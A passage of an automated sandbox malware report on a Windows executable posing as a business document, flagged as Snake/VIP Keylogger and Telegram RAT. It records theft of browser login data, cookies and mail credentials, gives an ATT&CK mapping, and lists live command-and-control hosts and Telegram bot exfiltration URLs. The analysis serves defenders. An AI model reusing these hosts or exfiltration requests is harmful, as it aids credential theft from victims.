Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe	Queries volume information: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe	Queries volume information: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation

Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected Snake Keylogger

Source: Yara match	File source: 0000000B.00000002.3737458655.0000000002D61000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000002.3735840864.0000000003231000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Yara detected Telegram RAT

Source: Yara match	File source: 11.2.Autofill Manufacturing Sdn Bhd 28-08-2024.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Autofill Manufacturing Sdn Bhd 28-08-2024.exe.34b5a70.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Autofill Manufacturing Sdn Bhd 28-08-2024.exe.34f8490.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Autofill Manufacturing Sdn Bhd 28-08-2024.exe.34f8490.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Autofill Manufacturing Sdn Bhd 28-08-2024.exe.34b5a70.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000B.00000002.3732114223.0000000000433000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1283369274.00000000034B5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Autofill Manufacturing Sdn Bhd 28-08-2024.exe PID: 7968, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: Autofill Manufacturing Sdn Bhd 28-08-2024.exe PID: 4820, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: GhrKoSGuCdvpJ.exe PID: 4268, type: MEMORYSTR

Yara detected VIP Keylogger

Source: Yara match	File source: 11.2.Autofill Manufacturing Sdn Bhd 28-08-2024.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Autofill Manufacturing Sdn Bhd 28-08-2024.exe.34b5a70.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Autofill Manufacturing Sdn Bhd 28-08-2024.exe.34f8490.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Autofill Manufacturing Sdn Bhd 28-08-2024.exe.34f8490.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Autofill Manufacturing Sdn Bhd 28-08-2024.exe.34b5a70.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000B.00000002.3732114223.0000000000433000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1283369274.00000000034B5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Autofill Manufacturing Sdn Bhd 28-08-2024.exe PID: 7968, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: Autofill Manufacturing Sdn Bhd 28-08-2024.exe PID: 4820, type: MEMORYSTR

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Top Sites
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies

Tries to steal Mail credentials (via file / registry access)

Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe	File opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\	Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	Jump to behavior
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe	File opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676

Source: Yara match	File source: 11.2.Autofill Manufacturing Sdn Bhd 28-08-2024.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Autofill Manufacturing Sdn Bhd 28-08-2024.exe.34b5a70.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Autofill Manufacturing Sdn Bhd 28-08-2024.exe.34f8490.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Autofill Manufacturing Sdn Bhd 28-08-2024.exe.34f8490.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Autofill Manufacturing Sdn Bhd 28-08-2024.exe.34b5a70.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.1283369274.00000000034B5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Autofill Manufacturing Sdn Bhd 28-08-2024.exe PID: 7968, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: Autofill Manufacturing Sdn Bhd 28-08-2024.exe PID: 4820, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: GhrKoSGuCdvpJ.exe PID: 4268, type: MEMORYSTR

Remote Access Functionality

Yara detected Snake Keylogger

Source: Yara match	File source: 0000000B.00000002.3737458655.0000000002D61000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000002.3735840864.0000000003231000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Yara detected Telegram RAT

Source: Yara match	File source: 11.2.Autofill Manufacturing Sdn Bhd 28-08-2024.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Autofill Manufacturing Sdn Bhd 28-08-2024.exe.34b5a70.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Autofill Manufacturing Sdn Bhd 28-08-2024.exe.34f8490.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Autofill Manufacturing Sdn Bhd 28-08-2024.exe.34f8490.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Autofill Manufacturing Sdn Bhd 28-08-2024.exe.34b5a70.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000B.00000002.3732114223.0000000000433000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1283369274.00000000034B5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Autofill Manufacturing Sdn Bhd 28-08-2024.exe PID: 7968, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: Autofill Manufacturing Sdn Bhd 28-08-2024.exe PID: 4820, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: GhrKoSGuCdvpJ.exe PID: 4268, type: MEMORYSTR

Yara detected VIP Keylogger

Source: Yara match	File source: 11.2.Autofill Manufacturing Sdn Bhd 28-08-2024.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Autofill Manufacturing Sdn Bhd 28-08-2024.exe.34b5a70.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Autofill Manufacturing Sdn Bhd 28-08-2024.exe.34f8490.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Autofill Manufacturing Sdn Bhd 28-08-2024.exe.34f8490.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Autofill Manufacturing Sdn Bhd 28-08-2024.exe.34b5a70.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000B.00000002.3732114223.0000000000433000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1283369274.00000000034B5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Autofill Manufacturing Sdn Bhd 28-08-2024.exe PID: 7968, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: Autofill Manufacturing Sdn Bhd 28-08-2024.exe PID: 4820, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	1 Scheduled Task/Job	1 Scheduled Task/Job	111 Process Injection	1 Masquerading	1 OS Credential Dumping	11 Security Software Discovery	Remote Services	1 Email Collection	1 Web Service	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	1 DLL Side-Loading	1 Scheduled Task/Job	11 Disable or Modify Tools	LSASS Memory	1 Process Discovery	Remote Desktop Protocol	11 Archive Collected Data	11 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	1 DLL Side-Loading	31 Virtualization/Sandbox Evasion	Security Account Manager	31 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	1 Data from Local System	3 Ingress Tool Transfer	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	111 Process Injection	NTDS	1 Application Window Discovery	Distributed Component Object Model	Input Capture	3 Non-Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 Deobfuscate/Decode Files or Information	LSA Secrets	1 System Network Configuration Discovery	SSH	Keylogging	14 Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	3 Obfuscated Files or Information	Cached Domain Credentials	1 File and Directory Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	12 Software Packing	DCSync	13 System Information Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	1 DLL Side-Loading	Proc Filesystem	System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
Autofill Manufacturing Sdn Bhd 28-08-2024.exe	61%	Virustotal		Browse
Autofill Manufacturing Sdn Bhd 28-08-2024.exe	58%	ReversingLabs	Win32.Spyware.Snakekeylogger
Autofill Manufacturing Sdn Bhd 28-08-2024.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe	58%	ReversingLabs	Win32.Spyware.Snakekeylogger
C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe	61%	Virustotal		Browse

Unpacked PE Files

⊘No Antivirus matches

Domains

Source	Detection	Scanner	Link
reallyfreegeoip.org	0%	Virustotal	Browse
api.telegram.org	2%	Virustotal	Browse
checkip.dyndns.com	0%	Virustotal	Browse
checkip.dyndns.org	0%	Virustotal	Browse

URLs

Source	Detection	Scanner	Label	Link
http://checkip.dyndns.org	0%	URL Reputation	safe
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	0%	URL Reputation	safe
https://reallyfreegeoip.org/xml/8.46.123.33	0%	URL Reputation	safe
https://www.ecosia.org/newtab/	0%	URL Reputation	safe
http://varders.kozow.com:8081	0%	URL Reputation	safe
http://aborters.duckdns.org:8081	100%	URL Reputation	malware
https://ac.ecosia.org/autocomplete?q=	0%	URL Reputation	safe
http://checkip.dyndns.org/	0%	URL Reputation	safe
https://reallyfreegeoip.org/xml/8.46.123.33$	0%	URL Reputation	safe
http://anotherarmy.dns.army:8081	100%	URL Reputation	malware
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	0%	URL Reputation	safe
http://checkip.dyndns.org/q	0%	URL Reputation	safe
https://reallyfreegeoip.org	0%	URL Reputation	safe
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	0%	URL Reputation	safe
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	0%	URL Reputation	safe
http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencoded	0%	URL Reputation	safe
https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:301389%0D%0ADate%20and%20Time:%2029/08/2024%20/%2019:20:11%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20301389%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D	0%	Avira URL Cloud	safe
https://reallyfreegeoip.org/xml/	0%	URL Reputation	safe
https://duckduckgo.com/chrome_newtab	0%	Avira URL Cloud	safe
https://api.telegram.org	0%	Avira URL Cloud	safe
https://duckduckgo.com/ac/?q=	0%	Avira URL Cloud	safe
https://www.office.com/	0%	Avira URL Cloud	safe
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	0%	Avira URL Cloud	safe
https://api.telegram.org/bot	0%	Avira URL Cloud	safe
https://api.telegram.org	1%	Virustotal		Browse
https://www.office.com/	0%	Virustotal		Browse
https://duckduckgo.com/chrome_newtab	0%	Virustotal		Browse
https://www.office.com/lB	0%	Avira URL Cloud	safe
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	0%	Avira URL Cloud	safe
https://chrome.google.com/webstore?hl=enp	0%	Avira URL Cloud	safe
https://api.telegram.org/bot/sendMessage?chat_id=&text=	0%	Avira URL Cloud	safe
https://chrome.google.com/webstore?hl=en	0%	Avira URL Cloud	safe
https://duckduckgo.com/ac/?q=	0%	Virustotal		Browse
https://www.office.com/lB	0%	Virustotal		Browse
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	0%	Virustotal		Browse
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	0%	Virustotal		Browse
https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:301389%0D%0ADate%20a	0%	Avira URL Cloud	safe
https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:301389%0D%0ADate%20and%20Time:%2030/08/2024%20/%2000:43:43%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20301389%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D	0%	Avira URL Cloud	safe
https://www.office.com/p	0%	Avira URL Cloud	safe
https://api.telegram.org/bot/sendMessage?chat_id=&text=	0%	Virustotal		Browse
https://api.telegram.org/bot	1%	Virustotal		Browse
https://chrome.google.com/webstore?hl=enlB	0%	Avira URL Cloud	safe
https://chrome.google.com/webstore?hl=en	0%	Virustotal		Browse
https://www.office.com/p	0%	Virustotal		Browse

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
reallyfreegeoip.org	188.114.97.3	true	true	0%, Virustotal, Browse	unknown
api.telegram.org	149.154.167.220	true	true	2%, Virustotal, Browse	unknown
checkip.dyndns.com	193.122.6.168	true	false	0%, Virustotal, Browse	unknown
checkip.dyndns.org	unknown	unknown	true	0%, Virustotal, Browse	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:301389%0D%0ADate%20and%20Time:%2029/08/2024%20/%2019:20:11%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20301389%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D	false	Avira URL Cloud: safe	unknown
https://reallyfreegeoip.org/xml/8.46.123.33	false	URL Reputation: safe	unknown
https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:301389%0D%0ADate%20and%20Time:%2030/08/2024%20/%2000:43:43%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20301389%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D	false	Avira URL Cloud: safe	unknown
http://checkip.dyndns.org/	false	URL Reputation: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://www.office.com/	GhrKoSGuCdvpJ.exe, 00000014.00000002.3735840864.00000000033DF000.00000004.00000800.00020000.00000000.sdmp, GhrKoSGuCdvpJ.exe, 00000014.00000002.3735840864.00000000033D0000.00000004.00000800.00020000.00000000.sdmp, GhrKoSGuCdvpJ.exe, 00000014.00000002.3735840864.000000000333C000.00000004.00000800.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://duckduckgo.com/chrome_newtab	Autofill Manufacturing Sdn Bhd 28-08-2024.exe, 0000000B.00000002.3743316325.0000000004026000.00000004.00000800.00020000.00000000.sdmp, GhrKoSGuCdvpJ.exe, 00000014.00000002.3741871407.00000000044F7000.00000004.00000800.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://duckduckgo.com/ac/?q=	Autofill Manufacturing Sdn Bhd 28-08-2024.exe, 0000000B.00000002.3743316325.0000000004026000.00000004.00000800.00020000.00000000.sdmp, GhrKoSGuCdvpJ.exe, 00000014.00000002.3741871407.00000000044F7000.00000004.00000800.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://api.telegram.org	Autofill Manufacturing Sdn Bhd 28-08-2024.exe, 0000000B.00000002.3737458655.0000000002E49000.00000004.00000800.00020000.00000000.sdmp, GhrKoSGuCdvpJ.exe, 00000014.00000002.3735840864.000000000331E000.00000004.00000800.00020000.00000000.sdmp	false	1%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	Autofill Manufacturing Sdn Bhd 28-08-2024.exe, 0000000B.00000002.3743316325.0000000004026000.00000004.00000800.00020000.00000000.sdmp, GhrKoSGuCdvpJ.exe, 00000014.00000002.3741871407.00000000044F7000.00000004.00000800.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://api.telegram.org/bot	Autofill Manufacturing Sdn Bhd 28-08-2024.exe, 00000000.00000002.1283369274.00000000034B5000.00000004.00000800.00020000.00000000.sdmp, Autofill Manufacturing Sdn Bhd 28-08-2024.exe, 0000000B.00000002.3737458655.0000000002E49000.00000004.00000800.00020000.00000000.sdmp, Autofill Manufacturing Sdn Bhd 28-08-2024.exe, 0000000B.00000002.3732114223.0000000000433000.00000040.00000400.00020000.00000000.sdmp, GhrKoSGuCdvpJ.exe, 00000014.00000002.3735840864.000000000331E000.00000004.00000800.00020000.00000000.sdmp	false	1%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://www.office.com/lB	Autofill Manufacturing Sdn Bhd 28-08-2024.exe, 0000000B.00000002.3737458655.0000000002F0A000.00000004.00000800.00020000.00000000.sdmp, GhrKoSGuCdvpJ.exe, 00000014.00000002.3735840864.00000000033DA000.00000004.00000800.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://chrome.google.com/webstore?hl=enp	Autofill Manufacturing Sdn Bhd 28-08-2024.exe, 0000000B.00000002.3737458655.0000000002ECF000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	Autofill Manufacturing Sdn Bhd 28-08-2024.exe, 0000000B.00000002.3743316325.0000000004026000.00000004.00000800.00020000.00000000.sdmp, GhrKoSGuCdvpJ.exe, 00000014.00000002.3741871407.00000000044F7000.00000004.00000800.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://checkip.dyndns.org	Autofill Manufacturing Sdn Bhd 28-08-2024.exe, 0000000B.00000002.3737458655.0000000002D61000.00000004.00000800.00020000.00000000.sdmp, GhrKoSGuCdvpJ.exe, 00000014.00000002.3735840864.0000000003231000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	Autofill Manufacturing Sdn Bhd 28-08-2024.exe, 0000000B.00000002.3743316325.0000000004026000.00000004.00000800.00020000.00000000.sdmp, GhrKoSGuCdvpJ.exe, 00000014.00000002.3741871407.00000000044F7000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://api.telegram.org/bot/sendMessage?chat_id=&text=	Autofill Manufacturing Sdn Bhd 28-08-2024.exe, 0000000B.00000002.3737458655.0000000002E49000.00000004.00000800.00020000.00000000.sdmp, GhrKoSGuCdvpJ.exe, 00000014.00000002.3735840864.000000000331E000.00000004.00000800.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://chrome.google.com/webstore?hl=en	GhrKoSGuCdvpJ.exe, 00000014.00000002.3735840864.00000000033AE000.00000004.00000800.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://www.ecosia.org/newtab/	Autofill Manufacturing Sdn Bhd 28-08-2024.exe, 0000000B.00000002.3743316325.0000000004026000.00000004.00000800.00020000.00000000.sdmp, GhrKoSGuCdvpJ.exe, 00000014.00000002.3741871407.00000000044F7000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://varders.kozow.com:8081	Autofill Manufacturing Sdn Bhd 28-08-2024.exe, 00000000.00000002.1283369274.00000000034B5000.00000004.00000800.00020000.00000000.sdmp, Autofill Manufacturing Sdn Bhd 28-08-2024.exe, 0000000B.00000002.3737458655.0000000002D61000.00000004.00000800.00020000.00000000.sdmp, Autofill Manufacturing Sdn Bhd 28-08-2024.exe, 0000000B.00000002.3732114223.0000000000433000.00000040.00000400.00020000.00000000.sdmp, GhrKoSGuCdvpJ.exe, 00000014.00000002.3735840864.0000000003231000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:301389%0D%0ADate%20a	Autofill Manufacturing Sdn Bhd 28-08-2024.exe, 0000000B.00000002.3737458655.0000000002E49000.00000004.00000800.00020000.00000000.sdmp, GhrKoSGuCdvpJ.exe, 00000014.00000002.3735840864.000000000331E000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://aborters.duckdns.org:8081	Autofill Manufacturing Sdn Bhd 28-08-2024.exe, 00000000.00000002.1283369274.00000000034B5000.00000004.00000800.00020000.00000000.sdmp, Autofill Manufacturing Sdn Bhd 28-08-2024.exe, 0000000B.00000002.3737458655.0000000002D61000.00000004.00000800.00020000.00000000.sdmp, Autofill Manufacturing Sdn Bhd 28-08-2024.exe, 0000000B.00000002.3732114223.0000000000433000.00000040.00000400.00020000.00000000.sdmp, GhrKoSGuCdvpJ.exe, 00000014.00000002.3735840864.0000000003231000.00000004.00000800.00020000.00000000.sdmp	true	URL Reputation: malware	unknown
https://ac.ecosia.org/autocomplete?q=	Autofill Manufacturing Sdn Bhd 28-08-2024.exe, 0000000B.00000002.3743316325.0000000004026000.00000004.00000800.00020000.00000000.sdmp, GhrKoSGuCdvpJ.exe, 00000014.00000002.3741871407.00000000044F7000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://reallyfreegeoip.org/xml/8.46.123.33$	Autofill Manufacturing Sdn Bhd 28-08-2024.exe, 0000000B.00000002.3737458655.0000000002DDE000.00000004.00000800.00020000.00000000.sdmp, Autofill Manufacturing Sdn Bhd 28-08-2024.exe, 0000000B.00000002.3737458655.0000000002E49000.00000004.00000800.00020000.00000000.sdmp, Autofill Manufacturing Sdn Bhd 28-08-2024.exe, 0000000B.00000002.3737458655.0000000002E23000.00000004.00000800.00020000.00000000.sdmp, GhrKoSGuCdvpJ.exe, 00000014.00000002.3735840864.00000000032B1000.00000004.00000800.00020000.00000000.sdmp, GhrKoSGuCdvpJ.exe, 00000014.00000002.3735840864.00000000032F4000.00000004.00000800.00020000.00000000.sdmp, GhrKoSGuCdvpJ.exe, 00000014.00000002.3735840864.000000000331E000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
